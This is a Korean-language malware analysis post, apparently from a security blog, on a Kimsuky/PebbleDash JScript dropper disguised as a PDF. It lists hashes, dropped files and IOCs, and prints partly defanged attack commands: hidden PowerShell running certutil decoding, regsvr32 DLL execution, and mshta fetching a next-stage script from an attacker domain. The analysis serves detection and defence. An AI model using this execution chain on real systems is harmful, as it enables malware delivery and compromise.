오늘은 북한 해킹 단체 김수키(Kimsuky) 에서 만든 악성코드인 노X정님.jse 에 대해서 글을 적어보겠습니다.PebbleDash 플랫폼을 기반으로 제작된 악성코드이며 해당 부분은 김수키(Kimsuky)의 자매인 Lazarus Group이 사용했던 도구입니다.
2021년 체적으로 활용해 오고 있습니다.
Kimsuky는 VSCode 터널링,Cloudflare Quick Tunnels, DWAgent, 대규모 언어 모델(LLM), Rust 프로그래밍 언어 등 다양한 도구를 사용해서 공격에 사용하고 있으며 주로 한국의 공공 및 민간 부문을 표적이며 특히 PebbleDash 클러스터는 전 세계 의료, 군사와 방위 산업 분야에 관심을 보였습니다. PebbleDash 클러스터는 지난 몇 년간 브라질과 한국의 방위 산업체뿐만 아니라 독일의 한 방위 산업체도 공격한적이 도 있습니다.
JSE 드로퍼는 최소 두 개의 Base64로 인코딩된 블롭을 포함
파일명:노X정님.pdf.jse
사이즈:56MB
MD5:8e15c4d4f71bdd9dbc48cd2cabc87806
SHA-1:13e2753bbebf5180b6fba4b234d9a08c953c0e01
SHA-256:38537c172dec2b985bd7e81d8a8aae7d760896cc2baf7ab25fff7ba9c4c36d3e
일단 간단하게 CyberChef JavsaScript Beautify 사용을 해서 보면 다음과 같은 결과를 볼 수가 있습니다.
악성코드 분석
JScript 기반 드로퍼 악성코드
1.주요 변수 복원
c65p3x6PHT:Microsoft.XMLDOM 객체
eVo25iaZLH:Scripting.FileSystemObject
a9Cgr3ZIqU:WScript.Shell
c4KUr7kf9F2:저장 경로
z0MU3cFpgR:Base64 디코딩용 XML 노드
xeqHb6HspS42ojcTXH:바이너리 저장용 ADODB.Stream
wnbWKopd21nukW482PL:두 번째 Base64 디코딩용 XML 노드
thyuUmYxqi4Tc:두 번째 파일 저장용 ADODB.Stream
2.저장 경로
GetSpecialFolder(0) 은 보통 Windows 폴더
페이로드는 C:\ProgramData 에 저장
3.생성되는 파일명
C:\ProgramData\vefIUW3km.s0L41
C:\ProgramData\blSsr3Hei.wxt1z
4.Base64 디코딩 및 파일 드롭 행위
의미: hsFT7Y9uzLZMm:해당 변수 안의 Base64 문자열을 바이너리로 디코딩
그 후 C:\ProgramData\(bdPzfn576QYES 값) 으로 저장 및 실행
C:\ProgramData\(bdPzfn576QYES) 해당 파일을 직접 실행
5.두 번째 페이로드 처리
두 번째 Base64 변수: 디코딩 후 저장 위치->C:\ProgramData\vefIUW3km.s0L41
복원:
Base64(oDOF30j???AeC)->C:\ProgramData\vefIUW3km.s0L41
그 다음 certutil 로 다시 디코딩
powershell.exe -windowstyle hi????en certutil -de???e C:\ProgramData\vefIUW3km(.)s0L41 C:\ProgramData\blSsr3Hei(.)wxt1z
흐름
oDOF30jANiAeC:XMLDOM bin.base64 디코딩->C:\ProgramData\vefIUW3km.s0L41:certutil -decode->C:\ProgramData\blSsr3Hei.wxt1z
6.regsvr32 실행
PowerShell을 사용자에게 보이지 않게 창으로 띄워 regsvr32를 대리 실행하는 형태
regsvr32.exe /s /n /i:<인자> 패턴
/s:조용히 실행
/n:DllRegisterServer 호출 생략
/i:3edc5tgb:DllInstall에 인자 전달
Regsvr32를 통한 악성 DLL 실행:50초간 Sleep을 한후 디코딩된 파일(blSsr3Hei.wxt1z)을 regsvr32.exe를 통해 실행
7.외부 접속 명령
복원된 실제 명령
powershell.exe -windowstyle hidd?n cmd(.)exe /c mshta.exe hxxp://morames(.)r-e(.)kr/comarov/app/google
공격자가 운영하는 서버에서 다음 단계 스크립트를 받아 실행하려는 행위
8.IOC
URL:hxxp://morames(.)r-e(.)kr/comarov/app/google
Domain:morames(.)r-e(.)kr
Dropped file:C:\ProgramData\vefIUW3km.s0L41
Dropped file:C:\ProgramData\blSsr3Hei.wxt1z
Unknown dropped file:C:\ProgramData\<bdPzfn576QYES>
Regsvr32 argument:/i:3edc5tgb
프로세스:powershell.exe,certutil.exe,regsvr32.exe,mshta.exe
요약
Base64로 숨긴 바이너리를 ProgramData에 저장
저장한 파일 실행
또 다른 Base64 데이터를 파일로 저장
certutil -decode로 디코딩
regsvr32.exe /s /n /i:(인자) (DLL) 형태로 실행
추가 단계로 mshta.exe를 통해 외부 URL 접속
아무튼, 내려받은 파일들을 분석해야 더 자세한 것을 확인할 수가 있을 것입니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 부킹닷컴 으로 위장 하고 있는 클릭픽스(ClickFix) 공격 사이트 분석 (0) | 2026.05.21 |
|---|---|
| Kimsuky(김수키)에서 만든 악성코드-하나은행_웨이브릿지 전략적 협업 제안서.lnk (0) | 2026.05.20 |
| 마이크로소프트 입장 번복 마이크로소프트 엣지,비밀번호 메모리 로딩 중단 (0) | 2026.05.19 |
| 윈도우 11,윈도우 10 KB5089549 & KB5087420,KB5087544 보안 업데이트 (0) | 2026.05.16 |
| 한전 전기 요금 청구서로 위장한 피싱 메일 분석 (0) | 2026.05.15 |
| 북한 해킹 단체 코니(Konni)에서 만든 악성코드-0a6934a3_.lnk (0) | 2026.05.14 |
| 인스타그램 다이렉트 메시지 종단 간 암호화 기능 제거 메타가 채팅 내용에 접근 가능 (0) | 2026.05.13 |
| 인스타그램 DM 으로 유포 되는 네이버 계정 탈취 목적 김수키(Kimsuky)에서 만든 네이버 피싱 사이트 분석 (0) | 2026.05.11 |
